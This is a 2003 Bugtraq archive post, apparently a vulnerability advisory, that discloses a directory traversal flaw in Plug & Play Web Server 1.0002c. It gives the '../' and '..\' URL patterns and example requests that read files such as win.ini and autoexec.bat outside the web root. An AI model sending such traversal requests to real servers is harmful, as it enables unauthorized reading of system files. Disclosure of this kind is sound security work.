Home page logo
/

bugtraq logo Bugtraq mailing list archives

Directory traversal in Plug & Play Web Server
From: Bahaa Naamneh <b_naamneh () hotmail com>
Date: 18 Sep 2003 08:42:16 -0000



Directory traversal in Plug & Play Web Server


Introduction:
=============
"The Plug and Play Web Server provides all of the tools you need to host your own website. The tools are bundled 
together in one comprehensive software package that it is incredibly easy to use and maintain."
- Vendors Description
   [ http://www.pandpsoftware.com ]


Details:
========
Vulnerable systems: Plug & Play Web Server version 1.0002c

Plug & Play Web Server have a Directory Traversal Vulnerability Using the string '../' or '..\' in a URL, an attacker 
can gain read access to any file outside of the intended web-published filesystem directory.

http://[target]/../../existing_file

http://[target]\..\..\existing_file

Examples:
---------
http://localhost/../../autoexec.bat

http://localhost/../../windows/win.ini

http://localhost/../../  [show the files and the folders in C drive - if the 'Show Directory list when homepage does 
not exist' option is active.]


Vendor status:
==============
The vendor has been informed, and they are fixing this bug.
The updated version, when released, can be downloaded from:

http://www.pandpsoftware.com/download.htm


Discovered by/Credit:
=====================
Bahaa Naamneh
b_naamneh () hotmail com
http://www.bsecurity.tk


  By Date           By Thread  

Current thread:
  • Directory traversal in Plug & Play Web Server Bahaa Naamneh (Sep 18)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault